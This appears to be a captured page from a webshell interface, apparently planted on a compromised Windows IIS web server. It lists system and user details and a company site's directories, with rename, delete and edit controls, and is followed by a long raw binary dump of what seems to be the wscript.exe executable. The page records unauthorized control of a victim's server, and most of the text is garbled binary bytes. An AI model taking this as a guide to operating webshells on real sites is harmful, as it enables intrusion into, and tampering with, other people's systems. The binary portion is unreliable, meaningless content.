Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
MZ� �� � @ � � � �!�L�!This program cannot be run in DOS mode. $ �Ƒ����ӓ��ӓ��Ӛ�lә���w��҃���w��ҕ��ӓ���q���w��Җ���w��ґ���w��ҹ���w��Ғ���w� Ӓ���w��Ғ���Rich���� PE L ��S� � � � @{ � @ � Q� @� � � 8 �� � � �� p � . T ( � � � .text (� � `.data � � � @ �.idata N � � @ @.rsrc �� � � � @ @.reloc � p H @ B `�A ��A �4@ �5@ �5@ 6@ 6@ �6@ �6@ @8@ �7@ �7@ �8@ @9@ P7@ �:@ �5@ ;@ @;@ �;@ �L@ pL@ �L@ A@ �?@ �@@ �@@ 6@ `A@ �A@ 0B@ �E@ `F@ �F@ G@ �D@ �L@ �L@ PL@ `G@ �G@ �L@ �L@ `L@ PH@ �H@ I@ �I@ J@ ��@ �z@ �z@ �z@ �z@ ��@ @�@ @�@ p�@ ��@ �@ @�@ p�@ �@ ��@ �@ ��@ `�@ �z@ �z@ �z@ �z@ �z@ �z@ �z@ �z@ �z@ �z@ `�@ p�@ ��@ @�@ P�@ �@ ��@ ��@ �@ `�@ ��@ ��@ ��@ 0�@ ��@ �@ �@ ��@ ��@ ��@ ��@ ��@ p�@ ��@ `�@ ��@ �@ �@ �@ ��@ ��@ ��@ ��@ ��@ P�@ `�@ p�@ ��@ P�@ p�@ ��@ ��@ ��@ �@ ��@ ��@ ��@ �A �A `A `A pA �z@ �z@ �z@ �z@ �z@ pA �A @A �A �A � A A `A A P A ��@ ��@ 0A @A A A PA �A 0A �A �A 0A �A �A �A �A �A A �A `A 07A �7A �7A 8A @8A `8A �8A P=A P�@ =A `A @>A `>A �hA �aA �hA �hA �hA �hA phA �hA �hA �A iA PiA @iA �iA @\A �\A ]A P]A �]A `�@ p�@ ��@ �LA �iA �iA �iA �LA �LA MA PMA 6@ �MA �MA �MA 0RA pRA �RA �PA SA PSA �[A piA �OA �iA �iA `hA 0iA iA �hA `iA �A iA �z@ �z@ �z@ �z@ �z@ �z@ �z@ �z@ ��@ ��@ �@ 6@ LA @LA pLA �bA PcA �RA �cA `bA ��@ ��@ �@ 6@ LA @LA pLA �gA �gA hA gA iA pfA �hA �hA �hA �hA phA �hA �hA �A iA ��@ ��@ �@ 6@ LA @LA pLA �A A PA �A A @A pA @A A �A �A P A � A � A P,A p2A �-A �1A � A 2A "A #A $A �kA @kA �hA �hA �hA �hA phA �hA �hA �A iA `�@ p�@ ��@ �KA ��@ ��@ �@ @KA �KA �lA 0lA �z@ �z@ �z@ �z@ ��A ��A �A �5@ P�A ��A �A ��A �A �A 6@ ��A P�A �A �A �A ��A 0�A P�A ��A p�A P�A ��A $,@ <,@ T,@ l,@ �+@ �+@ �,@ �,@ �,@ �,@ �+@ �+@ x@ 8@ @ �@ 0+@ H+@ `+@ x+@ �+@ �+@ �+@ �+@ �+@ �+@ �+@ ,@ �+@ �+@ P*@ X*@ `*@ h*@ p*@ x*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ �*@ +@ +@ $ +@ +@ +@ - (+@ � @�A l.@ ��A @ u p.@ �4 �5 �5 6 6 �6 �6 P7 �7 �7 @8 �8 @9 �: ; @; �; �? �@ �@ A `A �A 0B PD �D �E `F �F G `G �G PH �H I �I J PL `L pL �L �L �L �L �L �L `v �v �w 0x �x �x �z �z @{ � `� �� @� p� �� � `� �� � �� @� � �� �� �� �� � `� �� �� 0� �� � � �� �� �� � @� P� `� p� �� �� �� �� �� �� � �� P� p� �� �� �� p� �� `� �� � � � �� �� �� �� P� `� p� �� �� �� � ` ` � � P 0 @ � � 0 � ` p � 0 @ P ` p � � � � � � � � � ` P P � � @ p � @ � P � � � " # $ P, �- �1 2 p2 07 �7 �7 8 @8 `8 �8 = P= @> `> @K �K �K L @L pL �L �L M PM �M �M �M �O �P 0R pR �R S PS �[ @\ �\ ] P] �] �a `b �b Pc �c pf g �g �g h `h ph �h �h �h �h �h �h �h �h i i i 0i @i Pi `i pi �i �i �i �i �i �i @k �k 0l �l �� �� � P� �� � � �� � �� P� � � � �� 0� P� �� �� P� p� �� �� � F � F ��}T�e ++� � F � F�������� � 4�������� � 4�������� � 4�������� �_,�d � F � F � F � F <�Q���� �$Jz<�Q���� �$Jz <�Q���� �$Jz!<�Q���� �$Jz"<�Q���� �$Jz(<�Q���� �$Jz+<�Q���� �$Jz"�x�Q�� �_,�d���y����� � K��@Qm6t��4 � ` �w s c r i p t W S H R e m o t e . E x e c u t e Exception ReturnNt ReturnHr LogNt LogHr FailFast % h s ( % u ) \ % h s ! % p : % h s ! % p : ( c a l l e r : % p ) % h s ( % d ) t i d ( % x ) % 0 8 X % w s M s g : [ % w s ] C a l l C o n t e x t : [ % h s ] [ % h s ( % h s ) ] [ % h s ] wil n t d l l . d l l RtlQueryFeatureConfiguration RtlRegisterFeatureConfigurationChangeNotification RtlNotifyFeatureUsage NtQueryWnfStateData NtUpdateWnfStateData onecore\internal\sdk\inc\wil\opensource\wil\resource.h _ p 0 onecore\internal\sdk\inc\wil\staging.h L o c a l \ S M 0 : % d : % d : % h s uT��:�Au<��:�Aud��:�Aul��:�Au$��:�AuD��:�Au��:�Au\��:�Aut��:�AuL��:�Au,��:�Au4��:�A5���:�A�L%`;���� � �p�@ o����P K�P�����H���S K�P�B o����P K�P�A o����P K�P��3����R K�P��L%`;���� � �p�CLSID ProgID LocalServer32 %S %d.%d TypeLib Version 1.0 r e g s e r v e r u n r e g s e r v e r e m b e d d i n g . w s f \ S c r i p t E n g i n e �)�H��2 `����)�H��2 `����)�H��2 `����)�H��2 `���)�H��2 `����)�H��2 `����)�H��2 `����)�H��2 `���Fپ�:gYK�cn5�`l�)�H��2 `��� )�H��2 `���/<�Q���� �$Jz\ \ SOFTWARE\Classes\%s\%s k e r n e l 3 2 . d l l HeapSetInformation W L D P . D L L WldpGetLockdownPolicy WldpIsClassInApprovedList �QFv�8��� K�P�Open WSHFile �C ����@ ��B(ѩ�,���� K�P���d�YlB��{u<����L%`;���� � �p��*�K��z K6\�ScriptEngine Щ�,���� K�P��L%`;���� � �p�����_�C�(�ʖ�pI�T���� K�P��*����� �_,�d�L%`;���� � �p�ag���� �_,�dOpen2 `�7[���` � �p�<�Q���� �$JzWSFFile Shell _R�*�8�K��x-2Տ<�Q���� �$Jz �*����� �_,�d��+��� �_,�d�L%`;���� � �p�0 x % 8 X 0x%8X u r l m o n . d l l CreateURLMonikerEx S o f t w a r e \ M i c r o s o f t \ W i n d o w s S c r i p t H o s t \ S e t t i n g s W i n d o w s S c r i p t H o s t T r u s t P o l i c y U s e W I N S A F E R E n a b l e d R e m o t e L o g S e c u r i t y S u c c e s s e s I g n o r e U s e r S e t t i n g s L o g S e c u r i t y F a i l u r e s wsh wintrust.dll WinVerifyTrust WintrustGetRegPolicyFlags WintrustSetRegPolicyFlags advapi32.dll SaferIdentifyLevel SaferComputeTokenFromLevel SaferCloseLevel S C R I P T SaferRecordEventLogEntry W S c r i p t _ O n S c r i p t T e r m i n a t e ? �-4%���� `���j.I� enE� �aR�p�W S c r i p t W S H Ǭ题>�E��*x����X�����O�*��=�L�WSH-Timer n u l l W S c r i p t . C r e a t e O b j e c t S c r i p t F i l e D i s p l a y L o g o O p t i o n s T i m e o u t P a t h B D E H I J o b S T X C P l o g o n o l o g o U c s c r i p t W S H ���mg.$B�����v/ ] [ + | - ] . . . : [ %s%s.DLL 0 n o f a l s e E N D E J A K O T W C N F R E S B R I T N L S V D A F I H U N O E L P L R U C S P T T R S K S L A R H E E U I S s r - L a t n - C S s r - S P - L a t n s r - C y r l - C S s r - S P - C y r l s r - L a t n - B A s r - B A - L a t n s r - C y r l - B A s r - B A - C y r l i u - L a t n - C A i u - C A - L a t n b s - C y r l - B A b s - B A - C y r l b s - L a t n - B A b s - B A - L a t n z h - H a n t z h - C H T z h - H a n s z h - C H S M U I % s \ % s \ % s . m u i % s \ % s . m u i . \ % s \ % s . m u i . \ % s . m u i �Scp % s \ % s S o f t w a r e \ M i c r o s o f t \ A c t i v e S e t u p \ I n s t a l l e d C o m p o n e n t s \ { 8 9 8 2 0 2 0 0 - E C B D - 1 1 C F - 8 B 8 5 - 0 0 A A 0 0 5 B 4 3 8 3 } L o c a l e �����A �A ��S� $ / # ��S� ( </ <# ��S� $ d1 d% �� �. l �. �Q �Q �Q �Q �v Zw �y �y �y 0z 3z Pz Tz �z �z ~ ~ � �� � �� �� �� r� �� �� �� ` � �1 �g P� � RSDS�ʅZ��A�� ���W wscript.pdb GCTL � .rdata$brc � .CRT$XCA � .CRT$XCZ � .CRT$XIA � .CRT$XIZ � .CRT$XPA � .CRT$XPZ � .CRT$XTA .CRT$XTZ \ .gfids ` .rdata l. .rdata$sxdata p. � .rdata$voltmd / x .rdata$zzzdbg �1 �i .text$mn P� � .xdata$x � 8 .edata � @ .data$brc @� .data `� ` .bss � � .idata$5 �� .00cfg �� � .idata$2 � .idata$3 0� � .idata$4 �� � .idata$6 � � .rsrc$01 �� � .rsrc$02 �ʅZ��A�� ���W�^H����?~���S� jhP�A ��g ��u�3�f�F�E�V�\�A �F�3�@Ëe�u��F�E������ƋM�d� Y_^[��������jhp�A �g �M�A�E�8 t3��,�e� Q�d�A �3�@Ëe�E��@�E�����3��M�8���M�d� Y_^[��������jh��A �Hg �M�y u"�e� Q�d�A �3�@Ëe�E��@�E������M�d� Y_^[��������3�V��N,�@ �F �F�F�F�F�F�F �F$�F(������`�A �F��^������̋�U����e� ��SVW� ��jH�E�u��Hc Y���� ���������� �{E �� �{D �� �s(���V�p�����A ��;�t� �)�E���jP�0�N���A �V;�t� �)�E�Ph j jh"@ �l�A �ȉM���xK�M���x�C$Ph "@ Q�����A ��;�t� �)�ȉM���x�E�3�!]�� 3�����E� ��M��t���Q�p�����A ��;�t� �)��t���S�p�����A ��;�t� �)�E�_^[�������̋�S��VW�s�@ �p�A �s�p�A �s �p�A �K$��t���Q�p�����A ��;�t� �)�K(��t?���j Q�p�����A ��;�t� �)�C(��P��q�����A ��;�t� �)��,�{ tS�h�A _^[�������������������̋�U��UVW��u�@ ��t�u��@ 3ɋ�;�uA��u��,�`@ 3ɋ�;�uA��u��� "@ 3ɋ�;�u,A��u�M��� Q��p�����A ��;�t� �)3���"